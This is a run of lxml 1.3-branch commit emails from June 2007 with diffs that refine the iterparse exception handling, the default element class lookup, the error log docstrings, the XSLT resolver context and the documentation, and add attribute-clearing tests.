lxml/branch/lxml-1.3/src/lxml/iterparse.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/iterparse.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/iterparse.pxi Tue Jun 12 19:11:47 2007 @@ -48,7 +48,7 @@ c_ns = c_ns.next return count -cdef class _IterparseResolverContext(_ResolverContext): +cdef class _IterparseContext(_ResolverContext): cdef 
xmlparser.startElementNsSAX2Func _origSaxStart cdef xmlparser.endElementNsSAX2Func _origSaxEnd cdef _Element _root @@ -64,8 +64,8 @@ cdef char* _tag_href cdef char* _tag_name - def __init__(self, *args): - _ResolverContext.__init__(self, *args) + def __init__(self, _ResolverRegistry resolvers): + _ResolverContext.__init__(self, resolvers) self._ns_stack = [] self._pop_ns = self._ns_stack.pop self._node_stack = [] @@ -90,7 +90,7 @@ ITERPARSE_FILTER_END_NS): sax.endElementNs = _saxEnd - cdef void _setEventFilter(self, events, tag): + cdef _setEventFilter(self, events, tag): self._event_filter = _buildIterparseEventFilter(events) if tag is None or tag == '*': self._tag_href = NULL @@ -109,8 +109,7 @@ if self._tag_href is NULL and self._tag_name is NULL: self._tag_tuple = None - cdef void startNode(self, xmlNode* c_node): - cdef _Element node + cdef int startNode(self, xmlNode* c_node) except -1: cdef xmlNs* c_ns cdef int ns_count if self._event_filter & ITERPARSE_FILTER_START_NS: @@ -129,9 +128,9 @@ python.PyList_Append(self._node_stack, node) if self._event_filter & ITERPARSE_FILTER_START: python.PyList_Append(self._events, ("start", node)) + return 0 - cdef void endNode(self, xmlNode* c_node): - cdef _Element node + cdef int endNode(self, xmlNode* c_node) except -1: cdef xmlNs* c_ns cdef int ns_count if self._event_filter & ITERPARSE_FILTER_END: @@ -141,7 +140,6 @@ ITERPARSE_FILTER_START_NS | \ ITERPARSE_FILTER_END_NS): node = self._pop_node() - assert node._c_node is c_node else: if self._doc is None: self._doc = _documentFactory(c_node.doc, None) @@ -155,23 +153,36 @@ event = ("end-ns", None) for i from 0 <= i < ns_count: python.PyList_Append(self._events, event) + return 0 cdef void _pushSaxStartEvent(xmlparser.xmlParserCtxt* c_ctxt, xmlNode* c_node): - cdef _IterparseResolverContext context - context = <_IterparseResolverContext>c_ctxt._private - context.startNode(c_node) + cdef _IterparseContext context + context = <_IterparseContext>c_ctxt._private + try: + 
context.startNode(c_node) + except: + if c_ctxt.errNo == xmlerror.XML_ERR_OK: + c_ctxt.errNo = xmlerror.XML_ERR_INTERNAL_ERROR + c_ctxt.disableSAX = 1 + context._store_raised() cdef void _pushSaxEndEvent(xmlparser.xmlParserCtxt* c_ctxt, xmlNode* c_node): - cdef _IterparseResolverContext context - context = <_IterparseResolverContext>c_ctxt._private - context.endNode(c_node) + cdef _IterparseContext context + context = <_IterparseContext>c_ctxt._private + try: + context.endNode(c_node) + except: + if c_ctxt.errNo == xmlerror.XML_ERR_OK: + c_ctxt.errNo = xmlerror.XML_ERR_INTERNAL_ERROR + c_ctxt.disableSAX = 1 + context._store_raised() cdef xmlparser.startElementNsSAX2Func _getOrigStart(xmlparser.xmlParserCtxt* c_ctxt): - return (<_IterparseResolverContext>c_ctxt._private)._origSaxStart + return (<_IterparseContext>c_ctxt._private)._origSaxStart cdef xmlparser.endElementNsSAX2Func _getOrigEnd(xmlparser.xmlParserCtxt* c_ctxt): - return (<_IterparseResolverContext>c_ctxt._private)._origSaxEnd + return (<_IterparseContext>c_ctxt._private)._origSaxEnd cdef void _saxStart(void* ctxt, char* localname, char* prefix, char* URI, int nb_namespaces, char** namespaces, @@ -230,7 +241,7 @@ def __init__(self, source, events=("end",), tag=None, attribute_defaults=False, dtd_validation=False, load_dtd=False, no_network=False, remove_blank_text=False): - cdef _IterparseResolverContext context + cdef _IterparseContext context cdef char* c_filename cdef int parse_options if not hasattr(source, 'read'): @@ -246,7 +257,7 @@ c_filename = NULL self._source = source - _BaseParser.__init__(self, _IterparseResolverContext) + _BaseParser.__init__(self, _IterparseContext) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: @@ -263,7 +274,7 @@ parse_options = parse_options | xmlparser.XML_PARSE_NOBLANKS self._parse_options = parse_options - context = <_IterparseResolverContext>self._context + context = <_IterparseContext>self._context context._setEventFilter(events, tag) 
context._wrapCallbacks(self._parser_ctxt.sax) xmlparser.xmlCtxtUseOptions(self._parser_ctxt, parse_options) @@ -274,12 +285,12 @@ return self def __next__(self): - cdef _IterparseResolverContext context + cdef _IterparseContext context cdef int error cdef char* c_filename if self._source is None: raise StopIteration - context = <_IterparseResolverContext>self._context + context = <_IterparseContext>self._context if python.PyList_GET_SIZE(context._events) > context._event_index: item = python.PyList_GET_ITEM(context._events, context._event_index) python.Py_INCREF(item) # 'borrowed reference' from PyList_GET_ITEM @@ -291,7 +302,6 @@ while python.PyList_GET_SIZE(context._events) == 0 and error == 0: data = self._source.read(__ITERPARSE_CHUNK_SIZE) if not python.PyString_Check(data): - #xmlparser.xmlParseChunk(self._parser_ctxt, NULL, 0, 1) self._source = None raise TypeError, "reading file objects must return plain strings" elif data: @@ -307,6 +317,7 @@ _raiseParseError(self._parser_ctxt, self._filename) if python.PyList_GET_SIZE(context._events) == 0: self.root = context._root + self._source = None raise StopIteration context._event_index = 1 @@ -316,8 +327,8 @@ cdef class iterwalk: - """A tree walker that generates ``iterparse()`` events from an existing - tree as if it was parsing XML data. + """A tree walker that generates events from an existing tree as if it was + parsing XML data with ``iterparse()``. 
""" cdef object _node_stack cdef object _pop_node Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py Tue Jun 12 19:11:47 2007 @@ -290,6 +290,27 @@ self.assertEquals(None, root.get('three')) self.assertEquals('foo', root.get('three', 'foo')) + def test_attrib_clear(self): + XML = self.etree.XML + + root = XML('') + self.assertEquals('One', root.get('one')) + self.assertEquals('Two', root.get('two')) + root.attrib.clear() + self.assertEquals(None, root.get('one')) + self.assertEquals(None, root.get('two')) + + def test_attrib_set_clear(self): + Element = self.etree.Element + + root = Element("root", one="One") + root.set("two", "Two") + self.assertEquals('One', root.get('one')) + self.assertEquals('Two', root.get('two')) + root.attrib.clear() + self.assertEquals(None, root.get('one')) + self.assertEquals(None, root.get('two')) + def test_attribute_update_dict(self): XML = self.etree.XML Modified: lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd Tue Jun 12 19:11:47 2007 @@ -52,6 +52,8 @@ int wellFormed int recovery int options + int disableSAX + int errNo xmlError lastError xmlNode* node xmlSAXHandler* sax From scoder at codespeak.net Tue Jun 12 19:18:17 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:18:17 +0200 (CEST) Subject: [Lxml-checkins] r44189 - in lxml/branch/lxml-1.3: doc src/lxml src/lxml/tests Message-ID: <20070612171817.A535381A6@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:18:17 2007 New Revision: 44189 Modified: lxml/branch/lxml-1.3/doc/api.txt lxml/branch/lxml-1.3/doc/capi.txt 
lxml/branch/lxml-1.3/src/lxml/classlookup.pxi lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd lxml/branch/lxml-1.3/src/lxml/tests/test_classlookup.py lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi Log: merged in doc updates and revs 43349:43352 from trunk Modified: lxml/branch/lxml-1.3/doc/api.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/api.txt (original) +++ lxml/branch/lxml-1.3/doc/api.txt Tue Jun 12 19:18:17 2007 @@ -31,9 +31,10 @@ 3 Trees and Documents 4 Iteration 5 Error handling on exceptions - 6 Serialisation - 7 XInclude and ElementInclude - 8 write_c14n on ElementTree + 6 Error logging + 7 Serialisation + 8 XInclude and ElementInclude + 9 write_c14n on ElementTree lxml.etree @@ -188,29 +189,46 @@ ---------------------------- Libxml2 provides error messages for failures, be it during parsing, XPath -evaluation or schema validation. Whenever an exception is raised, you can -retrieve the errors that occurred and "might have" led to the problem:: +evaluation or schema validation. The preferred way of accessing them is +through the local ``error_log`` property of the respective evaluator or +transformer object. See their documentation for details. + +However, lxml also keeps a global error log of all errors that occurred at the +application level. Whenever an exception is raised, you can retrieve the +errors that occurred and "might have" led to the problem from the error log +copy attached to the exception:: >>> etree.clearErrorLog() - >>> broken_xml = '' + >>> broken_xml = ''' + ... + ... + ... + ... ''' >>> try: ... etree.parse(StringIO(broken_xml)) ... except etree.XMLSyntaxError, e: ... 
pass # just put the exception into e - >>> log = e.error_log.filter_levels(etree.ErrorLevels.FATAL) + +Once you have caught this exception, you can access its ``error_log`` property +to retrieve the log entries or filter them by a specific type, error domain or +error level:: + + >>> log = e.error_log.filter_from_level(etree.ErrorLevels.FATAL) >>> print log - :1:FATAL:PARSER:ERR_TAG_NOT_FINISHED: Premature end of data in tag a line 1 + :4:FATAL:PARSER:ERR_TAG_NAME_MISMATCH: Opening and ending tag mismatch: a line 3 and root + :5:FATAL:PARSER:ERR_TAG_NOT_FINISHED: Premature end of data in tag root line 2 This might look a little cryptic at first, but it is the information that libxml2 gives you. At least the message at the end should give you a hint -what went wrong and you can see that the fatal error (FATAL) happened during -parsing (PARSER) line 1 of a string (, or filename if available). -Here, PARSER is the so-called error domain, see lxml.etree.ErrorDomains for -that. You can get it from a log entry like this:: +what went wrong and you can see that the fatal errors (FATAL) happened during +parsing (PARSER) lines 4 and 5 of a string (, or the filename if +available). Here, PARSER is the so-called error domain, see +``lxml.etree.ErrorDomains`` for that. You can get it from a log entry like +this:: >>> entry = log[0] >>> print entry.domain_name, entry.type_name, entry.filename - PARSER ERR_TAG_NOT_FINISHED + PARSER ERR_TAG_NAME_MISMATCH There is also a convenience attribute ``last_error`` that returns the last error or fatal error that occurred:: @@ -219,13 +237,16 @@ >>> print entry.domain_name, entry.type_name, entry.filename PARSER ERR_TAG_NOT_FINISHED -Alternatively, lxml.etree supports logging libxml2 messages to the Python -stdlib logging module. This is done through the ``etree.PyErrorLog`` class. -It disables the error reporting from exceptions and forwards log messages to a -Python logger. 
To use it, see the descriptions of the function -``etree.useGlobalPythonLog`` and the class ``etree.PyErrorLog`` for help. -Note that this does not affect the local error logs of XSLT, XMLSchema, -etc. which are described in their respective sections below. + +Error logging +------------- + +lxml.etree supports logging libxml2 messages to the Python stdlib logging +module. This is done through the ``etree.PyErrorLog`` class. It disables the +error reporting from exceptions and forwards log messages to a Python logger. +To use it, see the descriptions of the function ``etree.useGlobalPythonLog`` +and the class ``etree.PyErrorLog`` for help. Note that this does not affect +the local error logs of XSLT, XMLSchema, etc. Serialisation Modified: lxml/branch/lxml-1.3/doc/capi.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/capi.txt (original) +++ lxml/branch/lxml-1.3/doc/capi.txt Tue Jun 12 19:18:17 2007 @@ -9,7 +9,7 @@ The API is described in the file `etreepublic.pxd`_, which is directly c-importable by Pyrex modules. -.. _`etreepublic.pxd`: http://codespeak.net/svn/lxml/branch/capi/src/lxml/etreepublic.pxd +.. _`etreepublic.pxd`: http://codespeak.net/svn/lxml/trunk/src/lxml/etreepublic.pxd .. contents:: .. @@ -23,6 +23,8 @@ This is the easiest way of extending lxml at the C level. 
A Pyrex module should start like this:: + # My Pyrex extension + # import the public functions and classes of lxml.etree cimport etreepublic as cetree @@ -47,7 +49,8 @@ def setValue(self, myval): self.set("my_attribute", myval) - etree.setDefaultElementClass(NewElementClass) + etree.setElementClassLookup( + DefaultElementClassLookup(element=NewElementClass)) Writing external modules in C Modified: lxml/branch/lxml-1.3/src/lxml/classlookup.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/classlookup.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/classlookup.pxi Tue Jun 12 19:18:17 2007 @@ -79,6 +79,9 @@ cdef class ElementDefaultClassLookup(ElementClassLookup): """Element class lookup scheme that always returns the default Element class. + + The keyword arguments ``element``, ``comment`` and ``pi`` accept the + respective Element classes. """ cdef readonly object element_class cdef readonly object comment_class @@ -86,21 +89,21 @@ def __init__(self, element=None, comment=None, pi=None): self._lookup_function = _lookupDefaultElementClass if element is None: - self.element_class = _Element + self.element_class = None elif issubclass(element, ElementBase): self.element_class = element else: raise TypeError, "element class must be subclass of ElementBase" if comment is None: - self.comment_class = _Comment + self.comment_class = None elif issubclass(comment, CommentBase): self.comment_class = comment else: raise TypeError, "comment class must be subclass of CommentBase" if pi is None: - self.pi_class = _ProcessingInstruction + self.pi_class = None elif issubclass(pi, PIBase): self.pi_class = pi else: @@ -109,17 +112,23 @@ cdef object _lookupDefaultElementClass(state, _Document _doc, xmlNode* c_node): "Trivial class lookup function that always returns the default class." 
if c_node.type == tree.XML_ELEMENT_NODE: - if state is None: + if state is not None: + cls = (state).element_class + if cls is None: return _Element else: - return (state).element_class + return cls elif c_node.type == tree.XML_COMMENT_NODE: - if state is None: + if state is not None: + cls = (state).comment_class + if cls is None: return _Comment else: - return (state).comment_class + return cls elif c_node.type == tree.XML_PI_NODE: - if state is None: + if state is not None: + cls = (state).pi_class + if cls is None: # special case XSLT-PI if c_node.name is not NULL and c_node.content is not NULL: if cstd.strcmp(c_node.name, "xml-stylesheet") == 0: @@ -128,7 +137,7 @@ return _XSLTProcessingInstruction return _ProcessingInstruction else: - return (state).pi_class + return cls else: assert 0, "Unknown node type: %s" % c_node.type @@ -145,9 +154,9 @@ dictionary. Arguments: - * attribute name ('{ns}name' style string) - * class mapping (Python dict mapping attribute values to Element classes) - * fallback (optional fallback lookup mechanism) + * attribute name - '{ns}name' style string + * class mapping - Python dict mapping attribute values to Element classes + * fallback - optional fallback lookup mechanism A None key in the class mapping will be checked if the attribute is missing. 
@@ -194,10 +203,9 @@ cdef object _parser_class_lookup(state, _Document doc, xmlNode* c_node): cdef FallbackElementClassLookup lookup lookup = state - if c_node.type == tree.XML_ELEMENT_NODE: - if doc._parser._class_lookup is not None: - return doc._parser._class_lookup._lookup_function( - doc._parser._class_lookup, doc, c_node) + if doc._parser._class_lookup is not None: + return doc._parser._class_lookup._lookup_function( + doc._parser._class_lookup, doc, c_node) return lookup._callFallback(doc, c_node) Modified: lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd Tue Jun 12 19:18:17 2007 @@ -36,7 +36,7 @@ cdef class lxml.etree._ElementTree [ object LxmlElementTree ]: cdef _Document _doc - cdef _Element _element + cdef _Element _context_node cdef class lxml.etree.ElementClassLookup [ object LxmlElementClassLookup ]: cdef object (*_lookup_function)(object, _Document, tree.xmlNode*) @@ -82,7 +82,7 @@ cdef object lookupNamespaceElementClass(_1, _Document _2, tree.xmlNode* c_node) - # call the fallback lookup function of an FallbackElementClassLookup + # call the fallback lookup function of a FallbackElementClassLookup cdef object callLookupFallback(FallbackElementClassLookup lookup, _Document doc, tree.xmlNode* c_node) Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_classlookup.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_classlookup.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_classlookup.py Tue Jun 12 19:18:17 2007 @@ -51,6 +51,31 @@ def test_default_class_lookup(self): class TestElement(etree.ElementBase): + FIND_ME = "default element" + class TestComment(etree.CommentBase): + FIND_ME = "default comment" + class TestPI(etree.PIBase): + FIND_ME = "default pi" + + parser = 
etree.XMLParser() + + lookup = etree.ElementDefaultClassLookup( + element=TestElement, comment=TestComment, pi=TestPI) + parser.setElementClassLookup(lookup) + + root = etree.XML(""" + + + + + """, parser) + + self.assertEquals("default element", root.FIND_ME) + self.assertEquals("default pi", root[0].FIND_ME) + self.assertEquals("default comment", root[1].FIND_ME) + + def test_default_class_lookup_is_not_nslookup(self): + class TestElement(etree.ElementBase): FIND_ME = "namespace class" ns = etree.Namespace("myNS") Modified: lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi Tue Jun 12 19:18:17 2007 @@ -128,6 +128,9 @@ self._entries = entries def copy(self): + """Creates a shallow copy of this error log. Reuses the list of + entries. + """ return _ListErrorLog(self._entries, self.last_error) def __iter__(self): @@ -146,6 +149,9 @@ return len(self._entries) def filter_domains(self, domains): + """Filter the errors by the given domains and return a new error log + containing the matches. + """ cdef _LogEntry entry filtered = [] if not python.PySequence_Check(domains): @@ -156,6 +162,9 @@ return _ListErrorLog(filtered) def filter_types(self, types): + """Filter the errors by the given types and return a new error log + containing the matches. + """ cdef _LogEntry entry if not python.PySequence_Check(types): types = (types,) @@ -166,8 +175,9 @@ return _ListErrorLog(filtered) def filter_levels(self, levels): - """Return a log with all messages of the requested level(s). Takes a - single log level or a sequence.""" + """Filter the errors by the given error levels and return a new error + log containing the matches. 
+ """ cdef _LogEntry entry if not python.PySequence_Check(levels): levels = (levels,) @@ -213,6 +223,8 @@ del self._entries[:] def copy(self): + """Creates a shallow copy of this error log and the list of entries. + """ return _ListErrorLog(self._entries[:], self.last_error) def __iter__(self): @@ -260,7 +272,8 @@ object and calls ``self.log(log_entry, format_string, arg1, arg2, ...)`` with appropriate data. """ - cdef public object level_map + cdef readonly object level_map + cdef object _map_level cdef object _log def __init__(self, logger_name=None): _BaseErrorLog.__init__(self) @@ -270,6 +283,7 @@ ErrorLevels.ERROR : logging.ERROR, ErrorLevels.FATAL : logging.CRITICAL } + self._map_level = self.level_map.get if logger_name: logger = logging.getLogger(logger_name) else: @@ -277,11 +291,13 @@ self._log = logger.log def copy(self): + """Dummy method that returns an empty error log. + """ return _ListErrorLog([]) def log(self, entry, message_format_string, *args): self._log( - self.level_map.get(entry.level, 0), + self._map_level(entry.level, 0), message_format_string, *args ) @@ -300,9 +316,8 @@ """Replace the global error log by an etree.PyErrorLog that uses the standard Python logging package. - Note that this slows down processing and disables access to the global - error log from exceptions. Parsers, XSLT etc. will continue to provide - their normal local error log. + Note that this disables access to the global error log from exceptions. + Parsers, XSLT etc. will continue to provide their normal local error log. """ global __GLOBAL_ERROR_LOG __GLOBAL_ERROR_LOG = log @@ -378,6 +393,11 @@ c_error.domain = xmlerror.XML_FROM_XSLT c_error.code = xmlerror.XML_ERR_OK # what else? c_error.level = xmlerror.XML_ERR_ERROR # what else? 
+ c_error.str1 = NULL + c_error.str2 = NULL + c_error.str3 = NULL + c_error.int1 = 0 + c_error.int2 = 0 _forwardError(c_log_handler, &c_error) From scoder at codespeak.net Tue Jun 12 19:20:45 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:20:45 +0200 (CEST) Subject: [Lxml-checkins] r44191 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070612172045.4D19C8198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:20:44 2007 New Revision: 44191 Modified: lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi Log: fix for last commit Modified: lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi Tue Jun 12 19:20:44 2007 @@ -393,11 +393,6 @@ c_error.domain = xmlerror.XML_FROM_XSLT c_error.code = xmlerror.XML_ERR_OK # what else? c_error.level = xmlerror.XML_ERR_ERROR # what else? - c_error.str1 = NULL - c_error.str2 = NULL - c_error.str3 = NULL - c_error.int1 = 0 - c_error.int2 = 0 _forwardError(c_log_handler, &c_error) From scoder at codespeak.net Tue Jun 12 19:25:31 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:25:31 +0200 (CEST) Subject: [Lxml-checkins] r44192 - in lxml/branch/lxml-1.3/doc: . html Message-ID: <20070612172531.AFF8F8198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:25:31 2007 New Revision: 44192 Modified: lxml/branch/lxml-1.3/doc/api.txt lxml/branch/lxml-1.3/doc/html/style.css Log: doc updates from trunk Modified: lxml/branch/lxml-1.3/doc/api.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/api.txt (original) +++ lxml/branch/lxml-1.3/doc/api.txt Tue Jun 12 19:25:31 2007 @@ -1,11 +1,11 @@ -===================== -APIs specific to lxml -===================== - -lxml tries to follow established APIs wherever possible. 
Sometimes, however, -the need to expose a feature in an easy way led to the invention of a new API. -This page describes the major differences and a few additions to the main -ElementTree API. +=========================== +APIs specific to lxml.etree +=========================== + +lxml.etree tries to follow established APIs wherever possible. Sometimes, +however, the need to expose a feature in an easy way led to the invention of a +new API. This page describes the major differences and a few additions to the +main ElementTree API. Separate pages describe the support for `parsing XML`_, executing `XPath and XSLT`_, `validating XML`_ and interfacing with other XML tools through the Modified: lxml/branch/lxml-1.3/doc/html/style.css ============================================================================== --- lxml/branch/lxml-1.3/doc/html/style.css (original) +++ lxml/branch/lxml-1.3/doc/html/style.css Tue Jun 12 19:25:31 2007 @@ -41,13 +41,13 @@ /*** TOC ***/ -div.contents.topic > ul { +div.contents.topic ul { margin-top: 0px; } -div.contents.topic > ul > li { +div.contents.topic ul > li { text-decoration: none; - line-height: 1.1em; + line-height: 1.2em; } div.contents.topic > p > a { From scoder at codespeak.net Tue Jun 12 19:26:48 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:26:48 +0200 (CEST) Subject: [Lxml-checkins] r44193 - in lxml/branch/lxml-1.3: . 
src/lxml Message-ID: <20070612172648.D49188198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:26:48 2007 New Revision: 44193 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/xslt.pxi Log: merged in bug fix from trunk rev 43574 Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 19:26:48 2007 @@ -22,6 +22,8 @@ Bugs fixed ---------- +* XSLT parsing failed to pass resolver context on to imported documents + * More ET compatible behaviour when writing out XML declarations or not * ``Element.attrib`` was missing ``clear()`` method Modified: lxml/branch/lxml-1.3/src/lxml/xslt.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xslt.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xslt.pxi Tue Jun 12 19:26:48 2007 @@ -131,6 +131,8 @@ c_doc = _xslt_resolve_stylesheet(c_uri, c_pcontext) if c_doc is not NULL: python.PyGILState_Release(gil_state) + if c_type == xslt.XSLT_LOAD_STYLESHEET: + c_doc._private = c_pcontext return c_doc c_doc = _xslt_resolve_from_python(c_uri, c_pcontext, parse_options, &error) @@ -141,6 +143,8 @@ _xslt_store_resolver_exception(c_uri, c_pcontext, c_type) python.PyGILState_Release(gil_state) + if c_doc is not NULL and c_type == xslt.XSLT_LOAD_STYLESHEET: + c_doc._private = c_pcontext return c_doc cdef xslt.xsltDocLoaderFunc XSLT_DOC_DEFAULT_LOADER From scoder at codespeak.net Tue Jun 12 19:31:03 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:31:03 +0200 (CEST) Subject: [Lxml-checkins] r44195 - lxml/trunk/src/lxml Message-ID: <20070612173103.F371B81A2@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:31:03 2007 New Revision: 44195 Modified: lxml/trunk/src/lxml/proxy.pxi Log: reverted wrong change from rev 43693 Modified: 
lxml/trunk/src/lxml/proxy.pxi ============================================================================== --- lxml/trunk/src/lxml/proxy.pxi (original) +++ lxml/trunk/src/lxml/proxy.pxi Tue Jun 12 19:31:03 2007 @@ -56,6 +56,7 @@ c_new_root = tree.xmlDocCopyNode(c_node, c_doc, 2) # non recursive! tree.xmlDocSetRootElement(c_doc, c_new_root) _copyParentNamespaces(c_node, c_new_root) + _copyParentNamespaces(c_node, c_root) c_new_root.children = c_node.children c_new_root.last = c_node.last From scoder at codespeak.net Tue Jun 12 19:32:03 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:32:03 +0200 (CEST) Subject: [Lxml-checkins] r44196 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070612173203.9EB4081A2@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:32:03 2007 New Revision: 44196 Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx Log: merged in rev 43695 from trunk Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 19:32:03 2007 @@ -1220,6 +1220,8 @@ if self._context_node is not None and \ self._context_node._doc is not None: return self._context_node._doc._parser + if self._doc is not None: + return self._doc._parser return None def write(self, file, encoding=None, @@ -1299,7 +1301,6 @@ path = "." + path return root.findall(path) - # extensions to ElementTree API def xpath(self, _path, namespaces=None, extensions=None, **_variables): """XPath evaluate in context of document. @@ -1376,7 +1377,8 @@ There is support for loading files through the file system, HTTP and FTP. - Note that XInclude does not support custom resolvers in Python space. + Note that XInclude does not support custom resolvers in Python space + due to restrictions of libxml2 <= 2.6.28. 
""" cdef python.PyThreadState* state cdef int result From scoder at codespeak.net Tue Jun 12 19:39:33 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:39:33 +0200 (CEST) Subject: [Lxml-checkins] r44197 - in lxml/branch/lxml-1.3: . src/lxml Message-ID: <20070612173933.E84C981A1@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:39:33 2007 New Revision: 44197 Modified: lxml/branch/lxml-1.3/TODO.txt lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/versioninfo.py Log: merged in revs 43837:43853 from trunk Modified: lxml/branch/lxml-1.3/TODO.txt ============================================================================== --- lxml/branch/lxml-1.3/TODO.txt (original) +++ lxml/branch/lxml-1.3/TODO.txt Tue Jun 12 19:39:33 2007 @@ -17,12 +17,6 @@ * more testing on multi-threading -ElementTree ------------ - -* _setroot(), even though this is not strictly a public method. - - QName ----- Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 19:39:33 2007 @@ -1190,6 +1190,14 @@ self._doc = None return self._context_node + def _setroot(self, _Element root not None): + """Relocate the ElementTree to a new root node. + """ + if root._c_node.type != tree.XML_ELEMENT_NODE: + raise TypeError, "Only elements can be the root of an ElementTree" + self._context_node = root + self._doc = None + def getroot(self): """Gets the root element for this tree. 
""" Modified: lxml/branch/lxml-1.3/versioninfo.py ============================================================================== --- lxml/branch/lxml-1.3/versioninfo.py (original) +++ lxml/branch/lxml-1.3/versioninfo.py Tue Jun 12 19:39:33 2007 @@ -38,7 +38,9 @@ elif data.startswith(' Author: scoder Date: Tue Jun 12 19:41:50 2007 New Revision: 44198 Modified: lxml/branch/lxml-1.3/doc/FAQ.txt lxml/branch/lxml-1.3/doc/build.txt Log: doc updates from trunk Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Tue Jun 12 19:41:50 2007 @@ -253,7 +253,12 @@ b) If you are using threads, please see the following section to check if you touch on one of the potential pitfalls. -c) Otherwise, we would really like to hear about it. Please report it to the +c) Try to reproduce the problem with the latest versions of libxml2 and + libxslt. From time to time, bugs and race conditions are found in these + libraries, so a more recent version might already contain a fix for your + problem. + +d) Otherwise, we would really like to hear about it. Please report it to the `mailing list`_ so that we can fix it. It is very helpful in this case if you can come up with a short code snippet that demonstrates your problem. Please also report the version of lxml, libxml2 and libxslt that you are Modified: lxml/branch/lxml-1.3/doc/build.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/build.txt (original) +++ lxml/branch/lxml-1.3/doc/build.txt Tue Jun 12 19:41:50 2007 @@ -44,7 +44,7 @@ http://codespeak.net/svn/lxml/pyrex/ A subversion checkout of lxml will automatically retrieve the latest Pyrex - as external project source (``svn:externals``). Look out for the ``Pyrex`` + as external project source (``svn:externals``). Look for the ``Pyrex`` directory in the source tree. 
Since version 1.1.2, the lxml source distribution also includes this Pyrex @@ -182,6 +182,26 @@ lxml maintainer. +Providing newer library versions on Mac-OS X +-------------------------------------------- + +The Unix environment in Mac-OS X makes it relatively easy to install +Unix/Linux style package management tools and new software. However, it seems +to be hard to get libraries set up for exclusive usage that Mac-OS X ships in +an older version. The result can be segfaults on this platform that are hard +to track down. + +To make sure the newer libxml2 and libxslt versions are used (e.g. under +fink), you should add the directory where you installed the libraries to the +``DYLD_LIBRARY_PATH`` environment variable. This seems to fix a lot of +problems for users. + +Alternatively, you can build lxml statically. A way to do this on MS Windows +is described in the next section, but it should be easy to adapt it for +Mac-OS. That way, you can always be sure you use the versions you compiled +lxml with, regardless of the runtime environement. + + Static linking on Windows ------------------------- From scoder at codespeak.net Tue Jun 12 19:46:15 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:46:15 +0200 (CEST) Subject: [Lxml-checkins] r44199 - in lxml/branch/lxml-1.3: . 
